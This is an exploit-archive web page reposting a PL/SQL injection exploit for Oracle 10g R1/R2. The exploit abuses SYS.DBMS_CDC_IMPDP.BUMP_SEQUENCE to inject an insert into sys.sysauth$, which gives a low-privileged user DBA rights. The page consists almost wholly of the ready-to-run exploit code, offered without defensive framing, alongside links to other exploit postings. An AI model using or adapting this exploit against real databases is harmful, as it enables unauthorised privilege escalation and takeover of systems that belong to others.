_
_ _ 09.06.2008
 
_ Navigation: _
Main Page Technology Downloads Security Entertainment Videos
Search Site: Advanced
_
 
Login Login
 
Register Register
   
_ News Item

Oracle 10g SYS.DBMS_CDC_IMPDP.BUMP_SEQUENCE PL/SQL Injection

Jan 24 2007 10:42:46
Source: ace
vote bad  vote good
0
/**
* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006
* Joxean Koret <joxeankoret@yahoo.es>
* Privileges needed:
*
* - CREATE SESSION
*
* Max.

Length 97. Very, very cool
*
*/
select *
from user_role_privs
;

DECLARE
SEQUENCE_OWNER VARCHAR2(200);
SEQUENCE_NAME VARCHAR2(200);
v_user_id number;
v_commands VARCHAR2(32767);
NEW_VALUE NUMBER;
BEGIN
SELECT user_id INTO v_user_id
FROM user_users;

v_commands := 'insert into sys.sysauth$ ' ||
' values' ||
'(' || v_user_id || ',4,' ||
'999,null)';

SEQUENCE_OWNER := 'TEST';
SEQUENCE_NAME := ''',lockhandle=>:1);' || v_commands || ';commit;
end;--';
NEW_VALUE := 1;
SYS.DBMS_CDC_IMPDP.BUMP_SEQUENCE(
SEQUENCE_OWNER => SEQUENCE_OWNER,
SEQUENCE_NAME => SEQUENCE_NAME,
NEW_VALUE => NEW_VALUE
);
END;
/

select *
from user_role_privs
;
.

» full story @ source-link: ace
Related Articles:
» Xpression News 1.0.1 (archives.php) Remote File Disclosure Exploit
» S-Gastebuch <= 1.5.3 (gb_pfad) Remote File Include Exploit
» PHP-Nuke Module Emporium <= 2.3.0 Remote SQL Injection Exploit
» SendStudio <= 2004.14 (ROOTDIR) Remote File Inclusion Vulnerability
_ Comments
Add Comment

Warning: fopen(/home/addict3d/public_html/cache//viewitem.phpiid=8647/Oracle+10g+SYS.DBMS_CDC_IMPDP.BUMP_SEQUENCE+PL) [function.fopen]: failed to open stream: Not a directory in /home/addict3d/public_html/viewitem.php on line 386

Warning: fwrite(): supplied argument is not a valid stream resource in /home/addict3d/public_html/viewitem.php on line 387

Warning: fclose(): supplied argument is not a valid stream resource in /home/addict3d/public_html/viewitem.php on line 388
You must be registered and logged in to add comments!

Register
Login
_ Sponsors

_ Sponsors